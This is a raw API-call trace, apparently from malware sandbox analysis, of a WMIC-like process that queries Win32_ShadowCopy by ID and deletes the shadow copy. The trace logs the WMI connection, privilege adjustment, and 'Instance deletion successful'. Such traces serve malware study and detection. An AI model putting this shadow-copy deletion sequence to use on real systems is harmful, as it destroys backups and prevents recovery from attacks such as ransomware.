??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f2f0 [0121.660] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0121.660] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0121.660] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x12f248 [0121.661] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x12f280 [0121.661] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.661] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4af4820 [0121.661] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.661] malloc (_Size=0x18) returned 0x4bcba0 [0121.661] malloc (_Size=0x18) returned 0x4bcc00 [0121.661] malloc (_Size=0x18) returned 0x4bcc20 [0121.661] malloc (_Size=0x18) returned 0x4bcc40 [0121.661] malloc (_Size=0x18) returned 0x4bcc60 [0121.661] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c [0121.661] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17 [0121.661] malloc (_Size=0x18) returned 0x4bcc80 [0121.661] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53 [0121.661] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x29 [0121.661] malloc (_Size=0x18) returned 0x4bcca0 [0121.661] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"") returned 0x7c [0121.661] SysStringLen (param_1="\"") returned 0x1 [0121.662] free (_Block=0x4bcc80) [0121.662] free (_Block=0x4bcc60) [0121.662] free (_Block=0x4bcc40) [0121.662] free (_Block=0x4bcc20) [0121.662] free (_Block=0x4bcc00) [0121.662] free (_Block=0x4bcba0) [0121.662] IWbemServices:GetObject (in: This=0x203b28, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"ShadowCopy\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x12f2c8*=0x0, ppCallResult=0x0 | out: ppObject=0x12f2c8*=0x210a50, ppCallResult=0x0) returned 0x0 [0121.663] malloc (_Size=0x18) returned 0x4bcba0 [0121.663] IWbemClassObject:Get (in: This=0x210a50, wszName="Text", lFlags=0, pVal=0x12f300*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffcf2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x12f300*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x314aa0*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x29e030, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0 [0121.663] free (_Block=0x4bcba0) [0121.663] SafeArrayGetLBound (in: psa=0x314aa0, nDim=0x1, plLbound=0x12f2e0 | out: plLbound=0x12f2e0) returned 0x0 [0121.663] SafeArrayGetUBound (in: psa=0x314aa0, nDim=0x1, plUbound=0x12f2d0 | out: plUbound=0x12f2d0) returned 0x0 [0121.663] SafeArrayGetElement (in: psa=0x314aa0, rgIndices=0x12f2c4, pv=0x12f318 | out: pv=0x12f318) returned 0x0 [0121.663] malloc (_Size=0x18) returned 0x4bcba0 [0121.663] malloc (_Size=0x18) returned 0x4bcc00 [0121.663] SysStringLen (param_1="Shadow copy management.") returned 0x17 [0121.664] free (_Block=0x4bcba0) [0121.664] IUnknown:Release (This=0x210a50) returned 0x0 [0121.664] free (_Block=0x4bcca0) [0121.664] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0121.664] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.664] free (_Block=0x4bcb80) [0121.664] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.664] lstrlenW (lpString="Shadow copy management.") returned 23 [0121.664] malloc (_Size=0x30) returned 0x4b85c0 [0121.664] lstrlenW (lpString="Shadow copy management.") returned 23 [0121.675] free (_Block=0x4bcc00) [0121.675] IUnknown:Release (This=0x2104e0) returned 0x0 [0121.676] free (_Block=0x4bcbc0) [0121.676] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.676] lstrlenW (lpString="PATH") returned 4 [0121.676] lstrlenW (lpString="where") returned 5 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3 [0121.676] lstrlenW (lpString="WHERE") returned 5 [0121.676] lstrlenW (lpString="where") returned 5 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0121.676] lstrlenW (lpString="/") returned 1 [0121.676] lstrlenW (lpString="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 43 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'", cchCount1=43, lpString2="/", cchCount2=1) returned 3 [0121.676] lstrlenW (lpString="-") returned 1 [0121.676] lstrlenW (lpString="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 43 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'", cchCount1=43, lpString2="-", cchCount2=1) returned 3 [0121.676] lstrlenW (lpString="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 43 [0121.676] malloc (_Size=0x58) returned 0x4bd020 [0121.676] lstrlenW (lpString="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 43 [0121.676] lstrlenW (lpString="/") returned 1 [0121.676] lstrlenW (lpString="delete") returned 6 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="/", cchCount2=1) returned 3 [0121.676] lstrlenW (lpString="-") returned 1 [0121.676] lstrlenW (lpString="delete") returned 6 [0121.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="-", cchCount2=1) returned 3 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] malloc (_Size=0xe) returned 0x4bcbc0 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] lstrlenW (lpString="GET") returned 3 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0121.677] lstrlenW (lpString="LIST") returned 4 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0121.677] lstrlenW (lpString="SET") returned 3 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0121.677] lstrlenW (lpString="CREATE") returned 6 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0121.677] lstrlenW (lpString="CALL") returned 4 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0121.677] lstrlenW (lpString="ASSOC") returned 5 [0121.677] lstrlenW (lpString="delete") returned 6 [0121.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0121.678] lstrlenW (lpString="DELETE") returned 6 [0121.678] lstrlenW (lpString="delete") returned 6 [0121.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0121.678] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.678] malloc (_Size=0x3e) returned 0x4bd080 [0121.678] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.678] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0121.678] malloc (_Size=0x18) returned 0x4bcc00 [0121.678] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*" [0121.678] lstrlenW (lpString="FROM") returned 4 [0121.678] lstrlenW (lpString="*") returned 1 [0121.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0121.678] malloc (_Size=0x18) returned 0x4bcb80 [0121.678] free (_Block=0x4bcc00) [0121.678] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3b00760009 | out: _String=0x0, _Context=0x3b00760009) returned="from" [0121.678] lstrlenW (lpString="FROM") returned 4 [0121.678] lstrlenW (lpString="from") returned 4 [0121.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0121.679] malloc (_Size=0x18) returned 0x4bcc00 [0121.679] free (_Block=0x4bcb80) [0121.679] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3c00760009 | out: _String=0x0, _Context=0x3c00760009) returned="Win32_ShadowCopy" [0121.679] malloc (_Size=0x18) returned 0x4bcb80 [0121.679] free (_Block=0x4bcc00) [0121.679] free (_Block=0x4bd080) [0121.679] free (_Block=0x4bcb80) [0121.679] lstrlenW (lpString="SET") returned 3 [0121.679] lstrlenW (lpString="delete") returned 6 [0121.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0121.679] lstrlenW (lpString="CREATE") returned 6 [0121.679] lstrlenW (lpString="delete") returned 6 [0121.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0121.679] free (_Block=0x4bcef0) [0121.679] malloc (_Size=0x8) returned 0x4b6f20 [0121.679] lstrlenW (lpString="GET") returned 3 [0121.679] lstrlenW (lpString="delete") returned 6 [0121.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0121.679] lstrlenW (lpString="LIST") returned 4 [0121.679] lstrlenW (lpString="delete") returned 6 [0121.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0121.680] lstrlenW (lpString="ASSOC") returned 5 [0121.680] lstrlenW (lpString="delete") returned 6 [0121.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0121.680] WbemLocator:IUnknown:AddRef (This=0x1f1390) returned 0x3 [0121.680] free (_Block=0x37dfb0) [0121.680] lstrlenW (lpString="") returned 0 [0121.680] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0121.680] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.680] malloc (_Size=0x14) returned 0x4bcb80 [0121.680] lstrlenW (lpString="XDUWTFONO") returned 9 [0121.680] GetCurrentThreadId () returned 0x7ec [0121.680] GetCurrentProcess () returned 0xffffffffffffffff [0121.680] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x12f6a0 | out: TokenHandle=0x12f6a0*=0x27c) returned 1 [0121.680] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12f698 | out: TokenInformation=0x0, ReturnLength=0x12f698) returned 0 [0121.680] malloc (_Size=0x118) returned 0x4bd080 [0121.680] GetTokenInformation (in: TokenHandle=0x27c, TokenInformationClass=0x3, TokenInformation=0x4bd080, TokenInformationLength=0x118, ReturnLength=0x12f698 | out: TokenInformation=0x4bd080, ReturnLength=0x12f698) returned 1 [0121.680] AdjustTokenPrivileges (in: TokenHandle=0x27c, DisableAllPrivileges=0, NewState=0x4bd080*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=-977755899, Attributes=0xb764), (Luid.LowPart=0x0, Luid.HighPart=4968176, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0), (Luid.LowPart=0x0, Luid.HighPart=0, Attributes=0x0))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.681] free (_Block=0x4bd080) [0121.681] CloseHandle (hObject=0x27c) returned 1 [0121.681] lstrlenW (lpString="GET") returned 3 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0121.681] lstrlenW (lpString="LIST") returned 4 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0121.681] lstrlenW (lpString="SET") returned 3 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="SET", cchCount2=3) returned 1 [0121.681] lstrlenW (lpString="CALL") returned 4 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CALL", cchCount2=4) returned 3 [0121.681] lstrlenW (lpString="ASSOC") returned 5 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0121.681] lstrlenW (lpString="CREATE") returned 6 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0121.681] lstrlenW (lpString="DELETE") returned 6 [0121.681] lstrlenW (lpString="delete") returned 6 [0121.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0121.682] malloc (_Size=0x18) returned 0x4bcc00 [0121.682] lstrlenA (lpString="") returned 0 [0121.682] malloc (_Size=0x2) returned 0x37dfb0 [0121.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc8314c, cbMultiByte=-1, lpWideCharStr=0x37dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.682] free (_Block=0x37dfb0) [0121.682] malloc (_Size=0x18) returned 0x4bcca0 [0121.682] lstrlenA (lpString="") returned 0 [0121.682] malloc (_Size=0x2) returned 0x37dfb0 [0121.682] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc8314c, cbMultiByte=-1, lpWideCharStr=0x37dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.682] free (_Block=0x37dfb0) [0121.682] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.682] malloc (_Size=0x3e) returned 0x4bd080 [0121.682] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0121.682] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xffffffffffffff20 | out: _String="Select", _Context=0xffffffffffffff20) returned="Select" [0121.682] malloc (_Size=0x18) returned 0x4bcba0 [0121.682] free (_Block=0x4bcca0) [0121.682] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x3f006e0007 | out: _String=0x0, _Context=0x3f006e0007) returned="*" [0121.682] lstrlenW (lpString="FROM") returned 4 [0121.682] lstrlenW (lpString="*") returned 1 [0121.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0121.683] malloc (_Size=0x18) returned 0x4bcca0 [0121.683] free (_Block=0x4bcba0) [0121.683] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x40006e0007 | out: _String=0x0, _Context=0x40006e0007) returned="from" [0121.683] lstrlenW (lpString="FROM") returned 4 [0121.683] lstrlenW (lpString="from") returned 4 [0121.683] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0121.683] malloc (_Size=0x18) returned 0x4bcba0 [0121.683] free (_Block=0x4bcca0) [0121.683] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x41006e0007 | out: _String=0x0, _Context=0x41006e0007) returned="Win32_ShadowCopy" [0121.683] malloc (_Size=0x18) returned 0x4bcca0 [0121.683] free (_Block=0x4bcba0) [0121.683] free (_Block=0x4bd080) [0121.683] malloc (_Size=0x18) returned 0x4bcba0 [0121.683] malloc (_Size=0x18) returned 0x4bcc20 [0121.683] malloc (_Size=0x18) returned 0x4bcc40 [0121.683] malloc (_Size=0x18) returned 0x4bcc60 [0121.683] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0121.683] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0121.684] malloc (_Size=0x18) returned 0x4bcc80 [0121.684] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0121.684] SysStringLen (param_1=" WHERE ") returned 0x7 [0121.684] malloc (_Size=0x18) returned 0x4bccc0 [0121.684] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ") returned 0x25 [0121.684] SysStringLen (param_1="ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 0x2b [0121.684] free (_Block=0x4bcc00) [0121.684] free (_Block=0x4bcc80) [0121.684] free (_Block=0x4bcc60) [0121.684] free (_Block=0x4bcc40) [0121.684] free (_Block=0x4bcc20) [0121.684] free (_Block=0x4bcba0) [0121.684] ??0CHString@@QEAA@XZ () returned 0x12f610 [0121.684] GetCurrentThreadId () returned 0x7ec [0121.684] malloc (_Size=0x18) returned 0x4bcba0 [0121.685] malloc (_Size=0x18) returned 0x4bcc20 [0121.685] malloc (_Size=0x18) returned 0x4bcc40 [0121.685] malloc (_Size=0x18) returned 0x4bcc60 [0121.685] malloc (_Size=0x18) returned 0x4bcc80 [0121.685] SysStringLen (param_1="\\\\") returned 0x2 [0121.685] SysStringLen (param_1="XDUWTFONO") returned 0x9 [0121.685] malloc (_Size=0x18) returned 0x4bcc00 [0121.685] SysStringLen (param_1="\\\\XDUWTFONO") returned 0xb [0121.685] SysStringLen (param_1="\\") returned 0x1 [0121.685] malloc (_Size=0x18) returned 0x4bcce0 [0121.685] SysStringLen (param_1="\\\\XDUWTFONO\\") returned 0xc [0121.685] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0121.685] free (_Block=0x4bcc00) [0121.685] free (_Block=0x4bcc80) [0121.686] free (_Block=0x4bcc60) [0121.686] free (_Block=0x4bcc40) [0121.686] free (_Block=0x4bcc20) [0121.686] free (_Block=0x4bcba0) [0121.686] malloc (_Size=0x18) returned 0x4bcba0 [0121.686] malloc (_Size=0x18) returned 0x4bcc20 [0121.686] malloc (_Size=0x18) returned 0x4bcc40 [0121.686] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1f1390, strNetworkResource="\\\\XDUWTFONO\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffcf29d0 | out: ppNamespace=0xffcf29d0*=0x203c18) returned 0x0 [0121.690] free (_Block=0x4bcc40) [0121.690] free (_Block=0x4bcc20) [0121.690] free (_Block=0x4bcba0) [0121.690] CoSetProxyBlanket (pProxy=0x203c18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.690] free (_Block=0x4bcce0) [0121.690] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0121.690] ??0CHString@@QEAA@XZ () returned 0x12f560 [0121.690] GetCurrentThreadId () returned 0x7ec [0121.690] malloc (_Size=0x18) returned 0x4bcce0 [0121.690] lstrlenA (lpString="") returned 0 [0121.690] malloc (_Size=0x2) returned 0x37dfb0 [0121.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffc8314c, cbMultiByte=-1, lpWideCharStr=0x37dfb0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0121.691] free (_Block=0x37dfb0) [0121.691] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy WHERE ID='{C7241040-5C13-409D-A239-55D005C03DE9}'") returned 0x50 [0121.691] SysStringLen (param_1="") returned 0x0 [0121.691] free (_Block=0x4bcce0) [0121.691] malloc (_Size=0x18) returned 0x4bcce0 [0121.691] IWbemServices:ExecQuery (in: This=0x203c18, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy WHERE ID='{C7241040-5C13-409D-A239-55D005C03DE9}'", lFlags=0, pCtx=0x0, ppEnum=0x12f568 | out: ppEnum=0x12f568*=0x203d18) returned 0x0 [0121.722] free (_Block=0x4bcce0) [0121.722] CoSetProxyBlanket (pProxy=0x203d18, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0121.725] IEnumWbemClassObject:Next (in: This=0x203d18, lTimeout=-1, uCount=0x1, apObjects=0x12f570, puReturned=0x12f580 | out: apObjects=0x12f570*=0x203d80, puReturned=0x12f580*=0x1) returned 0x0 [0121.727] malloc (_Size=0x18) returned 0x4bcce0 [0121.727] IWbemClassObject:Get (in: This=0x203d80, wszName="__PATH", lFlags=0, pVal=0x12f590*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x12f590*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0121.727] free (_Block=0x4bcce0) [0121.727] malloc (_Size=0x800) returned 0x4bd080 [0121.727] LoadStringW (in: hInstance=0x0, uID=0xb09c, lpBuffer=0x4bd080, cchBufferMax=1024 | out: lpBuffer="Deleting instance %1\r\n") returned 0x16 [0121.727] FormatMessageW (in: dwFlags=0x2500, lpSource=0x4bd080, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x12f4b8, nSize=0x0, Arguments=0x12f4c8 | out: lpBuffer="뚐/") returned 0x67 [0121.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0121.727] malloc (_Size=0x68) returned 0x4bd890 [0121.727] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", cchWideChar=-1, lpMultiByteStr=0x4bd890, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleting instance \\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"\r\n", lpUsedDefaultChar=0x0) returned 104 [0121.727] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffcf2ab0 [0121.727] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 103 [0121.728] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0121.728] free (_Block=0x4bd890) [0121.728] free (_Block=0x4bd080) [0121.728] LocalFree (hMem=0x2fb690) returned 0x0 [0121.728] IWbemServices:DeleteInstance (in: This=0x203c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{C7241040-5C13-409D-A239-55D005C03DE9}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0122.605] IUnknown:Release (This=0x203d80) returned 0x0 [0122.605] malloc (_Size=0x800) returned 0x4bd080 [0122.605] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x4bd080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0122.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0122.605] malloc (_Size=0x20) returned 0x4bcef0 [0122.605] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x4bcef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0122.605] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xffcf2ab0 [0122.605] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0122.605] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0122.605] free (_Block=0x4bcef0) [0122.605] free (_Block=0x4bd080) [0122.605] IEnumWbemClassObject:Next (in: This=0x203d18, lTimeout=-1, uCount=0x1, apObjects=0x12f570, puReturned=0x12f580 | out: apObjects=0x12f570*=0x0, puReturned=0x12f580*=0x0) returned 0x1 [0122.606] IUnknown:Release (This=0x203d18) returned 0x0 [0122.607] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0122.607] free (_Block=0x4bcca0) [0122.607] free (_Block=0x4bccc0) [0122.607] GetCurrentThreadId () returned 0x7ec [0122.607] ??0CHString@@QEAA@PEBG@Z () returned 0x12f748 [0122.607] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0x12f748 [0122.607] lstrlenW (lpString="LIST") returned 4 [0122.607] lstrlenW (lpString="delete") returned 6 [0122.607] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0122.607] lstrlenW (lpString="ASSOC") returned 5 [0122.607] lstrlenW (lpString="delete") returned 6 [0122.607] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0122.607] lstrlenW (lpString="GET") returned 3 [0122.607] lstrlenW (lpString="delete") returned 6 [0122.607] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0122.607] ??1CHString@@QEAA@XZ () returned 0x24b8a301 [0122.607] WbemLocator:IUnknown:Release (This=0x203c18) returned 0x0 [0122.607] ?Empty@CHString@@QEAAXXZ () 